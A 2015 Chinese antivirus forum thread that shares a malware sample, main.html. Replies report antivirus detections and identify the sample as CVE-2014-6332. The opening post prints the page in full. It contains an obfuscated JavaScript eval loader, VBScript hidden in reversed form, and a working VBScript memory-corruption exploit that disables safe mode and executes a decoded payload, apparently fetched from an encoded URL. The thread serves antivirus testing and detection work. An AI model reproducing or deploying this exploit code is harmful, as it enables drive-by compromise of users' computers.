查看: 12902|回复: 11
收起左侧

[病毒样本] main.html

[复制链接]
heishen2010
发表于 2015-5-15 23:22:31 | 显示全部楼层 |阅读模式
main.html

[mw_shl_code=html,true]<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<textarea style="display:none" id=lshdic200Xpage>>TPIRCS/<
noitcnuf dne
fi dne  
fi dne     
)(edomefastontes         
  esle     
                    )(edocllehsnur         
)noisreVtni(etirw.tnemucod         
)"EI >rb<"(etirw.tnemucod         
neht )4<noisreVtni(fi     

)0(wrhc&)00(wrhc&)76723(wrhc&)00(wrhc&yarraym=yarraym     
)00(wrhc&)00(wrhc&)00(wrhc&)00(wrhc&)00(wrhc&)10(wrhc&)6712(wrhc&)10(wrhc        =yarraym     
nehT eurT=)(etaerC fI  
)(tinInigeB  

0=x9niw  

fi dne  
            
  noitcnuf   tixe     
esle  
   ))2 ,5 + )"EISM" ,ofni(rtSnI ,ofni(diM(tnIC = noisreVtni            
neht   )0>)"EISM",ofni(rtsni( fi  

fi dne  
noitcnuf   tixe     
neht   )0>)"46niW",ofni(rtsni(fi  

tnegAresU.rotagivaN=ofni  
txeN emuseR rorrE nO  
)(nigeB noitcnuf
>"tpircSBV"=EGAUGNAL TPIRCS<</textarea>

<script>

var vhz2z4='*i*v*var**out*str**len***charCodeAt**case*length*y*return*z*if*c3*c4*p*0xff*sum*while*break*c2*c*fromCharCode*s*String*0xffffffff*mx*nbChar*char2*n*function*c1*w*ErTiUlaxlkP*e*t*do*X3cQCMIIF*AVgHbu2f*str2long*k*6b*0x3F*delta*char3*for*vl*BMOYPRD4H*join*long2str*false*nbencode*q*nbcode*utf8to16*key*GIEMslIELDjE*NtCion*sl*KEY*rvsOxpvC8YkAsDkZP63mpHg*y2ziN*UWg6eOqghqJBquonO7qDLCIv6ZsLMwCEABMstRpfpPuLdpdZoRduIU0zIX1WaaQSp105ThTTCnZw53lHyfOgYbB13G8vi8lvXMt0xo98GYKpD*0x3C*tR0boh3jLhogOo9SunbuWgR3TB2ra7HX98T3JBJ6*Xm*Kh6YG5DgocT9T8*Jz3xoSO*0XF*VKKod*6EEKgKaan81*ZDG4vsUH0tstiIEs2heZOES1tnS62abjLXGe07R*DxOwLecRRhd22fC7JOp*TDnY7fnIvGOdV2Dv7kJjB7*nXX35Y3s0YZn2tILq0vCZ4kuDn8NfQrLd5D0vru7so3rWu7*jeYGmoPWNA8UyE*pYltAsN31D0Cbfd8kD6bVwRsMsAIh34d*NrFBrYKWl7GjrGctp7X*JWL08kE*KNhcgTB7ob82*26K5syjM5ldUQ5QcKwhvewwoAug26lbQiCVbVoxQKPiSxbUEIKndyIr99WYtcercuZlR42Ee4DUQ*CoppoFKHB7jIP7YmqInWqQm8*1NoCrsSG97sLMUFRFrOVj*QOyH1lFCrpFcNArjoqsVvtjDlE9TPS4lfaOn*m3Tfx62*I*keNhu*0x30*Epo*71XyGSOuRcfuVG3snpdxvkxiUP34jy1tAHZTTnQZffPQ*SEJdLCsuzVZ5*F2tdj7U5Tvlird9TIRfiBO9IRZloDzr0*I2vxzGuef8bTx*GndLzVzI*kzl7S6x23nQ*zpJeQHK1klGMib6U60vo4Ik*N8nWaVTt4XIznOsncgVaigHpdh7HVxAcBaUINXYKXLMzA5PXwybQVGtFUmGf39gnN2W1kPDl5kdYQeBM7MCT9CgTdCKnIv57eGMY7S75*k6*MtVkF*fryjdOxo0qHNKv1WBPfAgOMSOFwY*wtjoA88KdIB*8qvm1tyQOkSz73tJeS8egVamKUmQytckGx2MBXS4tdcQJYC4bwx9LOFM3in576OQWsXE5j*K51jgllStwXl7j22sWWofHtsNjxPiR*Ptqoj9Vl04hDk0RsyoPjUFX8oPSO2QSDPZX1d97dF6P2CknBLMIknRXi1YlFi6Cm4grYGOzwJMn5SOJRMsu1grazEefBAP*DD6jZiOFHtDM9yEO5lK4zsZ1v*3N3EmfqKs*YDPQlEcSrisrq7gk9jokV76TQmhXX4UEd*zo*PB1kFhUyXYGH4lQXi4p4pWeFspUFEkaYPvtGyzR9T*sS*bsGPSeYRoFkWQHJy6bDI6tGsrKT6ZmGqdmZVdmhiANoGiNVV6J63JQ0QeNkVsll5fEq3AcSpxYhXeJ3p0ZFQVVj80iAXSmLW8n05Zsn4e*Nmy7XaXhcjZI088qoi*B5eDrMT0tsjIRX9VMgp8JObCujQrQOrWhwjFPp*ILiIOC*gnj1Y63Gcpo4KmDw8IfQ4*1tnCmM9VPaDHoXT*YaA81ar8QW6cbnDdoAxxPZhjPwyPRDTIgHW8MDn*mbOnpVfAZNVDZ7jJlVuVGKJtfnxvAYFloROmOYEwmFOJLd2aBN1uBKCjD0nO*QqdPDqh296S8m3a*pQkLCw0ifLdXflBtnEfFJv*f8AKHuYPCAEAL28NzAP0S*K38cL5EX5sXp4rtiebeGhg0wFjknsWBxYd1SclNnDZ12QA*3yhuZHDPkVcif1pVvrbJYo75VdOh2v6zRIK6fIDM2dBYh*awj0Z*TrVlhbPKOd5hZ3*3EKO8X9jKqWzkP91FltdZ*W3*yUCa3z1C33q7h1*dw5Tzyhx9cHQngaEy*8SVC2*HWl*o4rLjUS3GfByBhOx3gyXBIEPQ*sG8T*fKe9xV6qLfpPbFRyHrBOscVN0*xhKkTyKhHjB5*4TKPOotp7KmC18abCRjM6Jf8bMdAArceJxsGrgb7p9fwRT*u32dS5TYwIKm9EfVzyJvocZoPoHt57by0qlnCksbm0anxmsuEGR*Bqy4miRjJtQTssMzMrXD37hqyy9JyT5wwZ0cL*MlxtxmSVrrpwrm*7Khc*SYBwKOrRaD4kG0I2QvyajdvECp*window*new*Array*0x0F*0x1F*switch*charAt*cB1tZLuz3D2lq4B3qgMce63bcIbAEO*lJ5s2Rb99kK8MrJZsCP2Qfm*6TKMaPeWS*URi8ls7GmwCqPi4lo8BycFuAP*MiBJViPC5iP6H25GgeiQ*YlWWY2LggXnmotFGXyf1Ffd2QyiOujDQWh9dUlFqaek9AAZsKlXgwuKFRA62Fw0s6*Nf5dQ2r56njQEKv5m8x1Q3mCz*IHNGmVYJPBPzFI1INy4pdyB9sHghMSM9Drb2Bog8dtvCuDXthEcwmHF*Ba3BykK2gdgG6HgLChpyjL*O2f6HelUVpHvAczC4QKIV7xcrOK7EBB*E2ZLxSHpjTu0Wpb0rfNl8cR*wni2SM03kRuJmSO5K*M8IRa4xVbwMboJW3IgCWSLaqFhUruUQGf6sH8MrZexsVZ9ygUKh97XlIrOGGGdRc5LqwaJPX*3I9av8nv1Sn8t0YsxPwfEWuRr7n66zrr*Hip5aYZTpVKAnpl7*OXOmhuTB3m*GlDymrU5NR9Y41jjTodoDoaeDNj0rMpC0d3QKGsmDDNu*kEgSkVP0W015HY55LUVjKLNAT9kVZbZRsVHj2kEzWuwIG79isfzSlTUv2dGruWFiVw2tjegJQmtfkBbIOms0W7rf3yJFde3oLUG3JqYIRYnlBSErAa6hzAGBCMQmYLV*jGhgajGNFstHs4LK*DR5cW6ljmMgbCRuKEPWzhV1ZV6LqphUICZ4zxgU9CB4BB07XlteKnV8C*8Qbdj4mt5PH7VR*UkYs4Y21iRRwSyTuy5DKi3UfPuxJ1OWEsnywbheZcgOqYFzjuTB0ur6qPHUyviqa6eGTAMhype7LjWkkT*deaov7wOdBfmZYFjqbBhE*3QTM88sa8Jxr8GXce93EKaUQtBTPNrnzBBfYKRvwVPJ4ydYflo2dTYCYO59HRzqt46BLJQN5bzUx2ZJXoNol*Fl3DKgNqlv6bar*else*pvCkhoLeGV3Zc4MRDhDO*Z98EoPDQLhBS*bbmV8tJVb9Ydf4T9SOGDRyDmaMZ*3ymAMvjZ87*yc5aXcDiszajtBZjx3FaG7EOqSF*Ns8px85hcWzN5Wz5p5WY5gk0FdkuZdjw*poVaTByAqDmhNySAprzrZs2dBsfA2bqJVV2GQfY0iFpDPr*p8oU3P37CPhtAQ7S3PTpG8nvdilkenvoCV3gSXXIfjgxlFyquoydEh*cDDikhlfZp7UZ5XlJacsCoKKqIhlvicoSg7iwSlwGzSgo00DuKUcmaX3SMtBEN4VauFAXl8nK93d7aQF8OYTjde*E6BSuxsrqTu4PdS6pGX0B*7vQOcleefMxLshCXzluwABNk3ngOeO9t19adGHFbdUv5KP*s7VooNkzD6zESVMSPQSpvBxovUA*fQ5E8s4s1jvK2PYN2J8yI52pTqZjNmblsz9aDL*LSmd48IslCmQN3bhT*JDc8W5ybncVg54RFFtoh1GbIqMZjyNSbV*T9xeoQJ8xOyRiSN4JpUTEmDEGsOpiTmFYOArthzCOLk*Z27JBM3MzMeWq9SqsVnQd5gb53Q6A9ez7zNNmQ8ZqXiKyZFpfO0V9tuPwMtslIkiJU8xJsd2*V7FFoMEhm3wBwwPNENFgXJZ1ZgW1Nmq4bTRSyjiS*Zd2*UudPZlYUyR5ekto2cobqhJVuZ*ayN*QAFpnAfvkYJJohW9eiWjTu4C7xN7E*zrH48uINkDem*YVm5sjgEO4Ogk6JOrGnP5MY*pnYktc0Qc0i2tCx0h0gBm*17EM3SOWzeImm4*LppqzHHgBc7m6dJCEyT3PJfNh7AQtbNvQevzGYvWmWj9lXmk2s2nFW*0WTIeO*vRAkzP*nl*0z71yzV*goRTpec97*SMTxAQjeEkOtAmQzma4CpI2QBsPBK4pthVjEry35ItrJnLyuHb59cIIsqTyL1NwNa608Lep0m5OqvsHYC2mHKJ2GxfmNqt2bEuucXidobSOCa4JcCl7kwzbvZh1zXeIRoUCvYNrEnzsX5PxoVXFUcwMAu9*giLlcDqsfV8PT7veYksflo3sFMinjketQVHTiHPPFM5izcpCEQuzTW2Tmxlnft5AL1Tqybkz3qCBV5IWOnuKcFTYE4OL6x*54bgP*sp457*8hs6OrVWXXCPbmk8X8bfy6LvW*Aipzuuy4EgpAj4H2Z2Gh9Vv8L2bmWGgltkue6ztBRO87f*ijoNU*2fOeAQEqkK1vMTgKDVE95kUeiySSwMNBZ54PMAnjmTSJu6iNwv8PgU3sP6tRh2DBGtiKvr7AcvgFqXgnVsJmbQrDQHE3kUHNcx7BKYM6FYJAOvhIQCcw7b8xeBWhk0bL*f7G*VNkx4pVPsacbgLhSSvMbhAS42NcHFXil23KmDvFD7tDhzTLeQMwfKh*taTF*xK18oOw4ZyE9xydh*Cq*42ESlM9rCqP8yjpthOU3kIXb2pTygGEBXLaxW3eBQGxw2rijv*9EGYJCI71lTr9mCrt2d2IAyr8WBYKMgb*R5CU1472GZf4BWGoR0zxzvc0vpJePu66ChY2T*rXgYerNZOyTpgoPzOZpOeRvYaEtl31t6IYg7AykZ4HnULW6*peOtxg6X8*GvdyjRX*uOwcXd*KmZ3B81sQ0e3mzsk3hSpHywh*vCSuONFiVVtimVT*Ys*WPm9dslabPGV*iJ2wfG*e4*rPyI27olt020sYYj6BaEUWtW9o8rGXFyKFx3eJ*vSNCdlqIpAv8t4YjA1Kb49uKIjPoDYx*sbMDQrTz*AxJM*hjH2vG0*Math*floor*0x9E3779B9*OHxDJoRWA8PylpfdQLuoZ2ZZ8iPB2BniXjQci*WjomBheTpzQJ13cCPPrLOpjtsEmpOESYR6MTW5KmYsXIMo5qK3YEh*n2Qf*6e*6d*6f*cape*0YdokIYcPYWPg1HvqVnwcGOu3r4oeyNWHSjwEL1xlzLLMd*XmGsU9fcBeme3*r5LcWM7*WHN0v3b9QVQal4ufPd2q5wjalmEW8pyHNB0hQysUvqf9Fyp2F38OVrNmDA7eilrdOqfTBhWQK4aD10mOgKYNOElEQ4gYZmbGoctYM30aebSEMx7c*2nP6kfZ0U5f8QLnHdpROHhgMccY3TgXItgz7zckjO1UyMBmz*m9qtTsGtKJGuTTxby3UgZ*substring*gRCeYu7lnafjQTQX5am5IwddM9yLr29so9sZOI6yVeYCEk7QVxEAakV314Yw*GBGcL9Lir*Ec0BfEufdrhFcv6y8RiImklx0PoQNDf1IwMXu*qNDb2OSMw*ANdI*CsmtpTshktNRJGVZz2ngNGa07N6uiea7iAYRdYXu4BMRTexpLY6skCkFDVrZqy1VGYIf638q1*Skh*3iWnNxz7TmyX8N33V15nPiNoNi2KyAwOaCuxmPh9rKBTZ9GRx1Kr8UTZuj48bUdKQO*1KqwrbplTw66V00QD48r6p*qhd8qM2YL*1wyc9M0m*0x03*YbCn5PD0IeaVdBftQPKqFkcX6lZdPalr6wpg5O6pufUpY1qtFJ4zXKqQqU8OM8HSWlXe3xAcPCO2*g9KRbUBcgQiwRzxayWvM93Jkcv9bBcLq5qqWG8t0VuELT8qLs87q30i5owdm7VbZ5EogwhJz75AjyhfW0bkCu1*3Xino1HYXPH7ZUITEJmws7eelQaB6*yiObHb1BQk3*ywPhRFmNhPSENybn0VgpnsOD2V1WxZoLLbmy0zvsoRWUCee14eZ2xTk1YNSxQhDTnIArEd270C7o*onavoY4UwfPjbe2651MHsGyttl*5nspubeYVRIoouJL1MpOiHu*vfBRlcUTCj4y6K6FLvmvI*YfeLeRNKnpwefmVF7d*WwqfUj*sV3PsNGkBSMhFD1xiVVeOX*Mb*UWSCGf068jaMl9ZLVOAs8HKxa0V*ley5ujaSAzKXEyTmH2x9P*LHvxD37cqmOxO3W*ocxcydxXsRL5aUAZ0dykCMoX*bCzlvunC2qMZoWYhHOOdftdMPLrqYONaYqqupNFUibrDPoTbxcjlavb*ZbRKp34*y360KrfItCjqoL4LPOM0I4xcnG5Ho3dBJij*eval*etD53*P8MYxleaHCCUyMwbnadKFh47OzR1T3KrXx*unes*S20CWVvgfoifSCMjs8Y86HMCJDiDKsCkYGviNkcLmMDQlUgeeBF3K3OzSNYo*wMrtLU*FMQY9bqo6HfpAJlZXixgzR5kpsv3IW0CuPVFUWKN*ocNwdBWT50Cz2jNjdFu*true*KjPFA712sJq2WLpxhmQud8IJorJW6CL40gKRBijWUfBfefmk1XBgNaEuKT8KBOffErhRxYnL*RmylyXou4XkBodEfgzMm',vHz2=window["\x65\x76\x61\x6c"],ALYgrt3='\x2A',HlssUrQp1='\x73\x70\x6c\x69\x74',vhz2z='';try{window["\x61\x6c\x65\x72\x74"](a,b,c);}catch(e){for(var j=0;j<65;j++){vhz2z+=ALYgrt3;}var /*jsnb*/vhz2z3/*jsnb*/=/*jsnb*/vhz2z/*jsnb*/+/*jsnb*/vhz2z4;/*NB VIP*/vHz2(/*3.17*/function(/*vip jsnb*/p,/*vip jsnb*/a,/*vip jsnb*/c,/*478188809*/k,/*vip jsnb*/e,/*vip jsnb*/d/*vip jsnb*/){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('68 109=356("359"+"317"),127="%31"+"%32"+"%33"+"%34"+"%35"+"%36"+"%37"+"%38",108="%64"+"%316"+"%63"+"%75"+"%315"+"%65"+"%314%74",130="332/335/330+133+166/136+168+167+159/160/161+162+157+153+152/154/155/156/163+92/173+174/175+171/170/165/151+169+176+147/132/137/135+138+131/150+140/148/149+146/145/141+142+143+144/164/243/222+221+177/223+224+226+225+220+219+227+66+228+238/237+239+329/200+201/199+198+195/196/197//202/203/208+209+207/206++204/205+194+193+183+184/182/181+178/179+180+185+186+191+192/190+189+187+188+210/211/233+234/232+231+229/230+235+236/241+242/240",104="%77"+"%72"+"%69"+"%74"+"%65",118;101 125(71){68 70,66,73,92;68 99,115;70=[];73=71.79;66=0;89(66<73){92=71.76(66++);217(92>>4){78 0:78 1:78 2:78 3:78 4:78 5:78 6:78 7:70[70.79]=71.218(66-1);90;78 12:78 13:99=71.76(66++);70[70.79]=95[\'93\'](((92&216)<<6)|(99&113));90;78 14:99=71.76(66++);115=71.76(66++);70[70.79]=95.93(((92&215)<<12)|((99&113)<<6)|((115&113)<<0));90}}81 70.119(\'\')}68 128="%39"+"%63"+"%112"+"%63"+"%112"+"%63"+"%112";68 98=213 214(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);108=109(108);101 124(71){68 102,91,84,85;68 66,73,70;73=71.79;66=0;70="";89(66<73){107{102=98[71.76(66++)&87]}89(66<73&&102==-1);83(102==-1)90;107{91=98[71.76(66++)&87]}89(66<73&&91==-1);83(91==-1)90;70+=95.93((102<<2)|((91&158)>>4));107{84=71.76(66++)&87;83(84==61)81 70;84=98[84]}89(66<73&&84==-1);83(84==-1)90;70+=95.93(((91&139)<<4)|((84&134)>>2));107{85=71.76(66++)&87;83(85==61)81 70;85=98[85]}89(66<73&&85==-1);83(85==-1)90;70+=95.93(((84&336)<<6)|85)}81 70}101 120(67,103){68 117=67.79;68 129=67[117-1]&96;116(68 66=0;66<117;66++){67[66]=95.93(67[66]&87,67[66]>>>8&87,67[66]>>>16&87,67[66]>>>24&87)}83(103){81 67.119(\'\').324(0,129)}244{81 67.119(\'\')}}101 110(94,103){68 73=94.79;68 67=[];116(68 66=0;66<73;66+=4){67[66>>2]=94.76(66)|94.76(66+1)<<8|94.76(66+2)<<16|94.76(66+3)<<24}83(103){67[67.79]=73}81 67}118=109(127+128);101 122(71,126){83(71==""){81""}68 67=110(71,121);68 111=110(126,121);68 100=67.79-1;68 82=67[100-1],80=67[0],114=310;68 97,105,123=308.309(6+52/(100+1)),88=123*114&96;89(88!=0){105=88>>>2&3;116(68 86=100;86>0;86--){82=67[86-1];97=(82>>>5^80<<2)+(80>>>3^82<<4)^(88^80)+(111[86&3^105]^82);80=67[86]=67[86]-97&96}82=67[100];97=(82>>>5^80<<2)+(80>>>3^82<<4)^(88^80)+(111[86&3^105]^82);80=67[0]=67[0]-97&96;88=88-114&96}81 120(67,364)}104=109(104);106="361/362+366/353/352/342/343///341/340+338+339/344/345+350/351/349/348/346+347+307/306++265+266/264+263/261/262/267/268+273/274/272+271/269/270+260/259+249/250/248+247+245/246+/251/252+257/258/256/255/253+254+275+276/297+298+296/295+293+294+299/300+305+304+303/301/302/292/291/281+282+"+130+"+280/279/277/278+283/284/289/290+288+287+285+286+172/365+363/360/+355+354+357+358+337/318+/319+320+311+313/312/321+322/331+333/334/323+325/326+/328++327";106=125(122(124(106),118));212[108][104](106);',10,367,vhz2z3[HlssUrQp1](ALYgrt3),0,{}))}function llll(){var bmw=new Array(263,275,275,271,217,206,206,258,256,273,260,269,257,260,256,276,275,280,205,258,270,268,206,278,210,258,206,278,264,269,205,260,279,260,159); return bmw;}

</script>
                                                                                                            

<SCRIPT LANGUAGE="VBScript">

function runurl(x)
        For i=1 to Len(x) Step 2
        runurl=runurl & Chr(CLng("&H" & Mid(x,i,2)) Xor N)
        Next
end function

function rechange(k)
        NB=Split(k,"*")
        NBWM=""
        For i = 0 To UBound(NB)
        NBWM=NBWM+Chrw(eval(NB(i)-N))
        Next
        rechange=NBWM
End Function

function runmumaa()
        On Error Resume Next
                Execute runurl(X)
end function

</script>
<script language="VBScript">
  document.write(strreverse(lshdic200Xpage.value))
</script>
<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray


Begin()



function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)     
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
  
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function


function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)  
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
              j=0         
              redim  Preserve aa(a2)            
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  

     j=0
              j=readmemo(i+&h120+k)   
         
               Exit for
           end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
  
    redim  Preserve aa(a0)
    redim   ab(a0)     
  
    redim  Preserve aa(a2)
  
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
         
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16            
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then   
                 If(IsObject(aa(a1)) = False ) Then            
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function

           end if
        else
           if(vartype(aa(a1-1))<>0)  Then   
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
              
   
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  

    redim  Preserve aa(a0)         
        
end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)  
  
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313      
    ReadMemo=lenb(aa(a1))  
   
    ab(0)=0   

    redim  Preserve aa(a0)
end function

</script>

</body>
</html>[/mw_shl_code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
230f4
发表于 2015-5-15 23:23:01 | 显示全部楼层
ess杀
skyboybone
发表于 2015-5-15 23:23:32 | 显示全部楼层
跳过测试
利刀1937
发表于 2015-5-15 23:24:53 | 显示全部楼层
个人最喜欢网址拦截弹窗

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
西洋镜
发表于 2015-5-15 23:32:55 | 显示全部楼层
红伞发现一只

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Luca.l
发表于 2015-5-15 23:43:52 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
开开心心卖手机
发表于 2015-5-15 23:50:56 | 显示全部楼层
Website blocked!
G DATA INTERNET SECURITY has denied access to this website.
The site contains infected code: HTML.Trojan.Agent.JRZFC3 (Engine B).
XywCloud
发表于 2015-5-16 00:42:44 | 显示全部楼层
Collected
275751198
发表于 2015-5-16 11:09:26 | 显示全部楼层
360
类型:
virus.vbs.cve-2014-6332.a

描述:
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。

扫描引擎:
360云查杀引擎

文件指纹(MD5):
0d5b8f863664253408e217c7ccd3bd26
paul_guo
发表于 2015-5-16 11:29:16 | 显示全部楼层
CVE。。。。。。。。。。FS击杀
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-24 20:42 , Processed in 0.154365 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表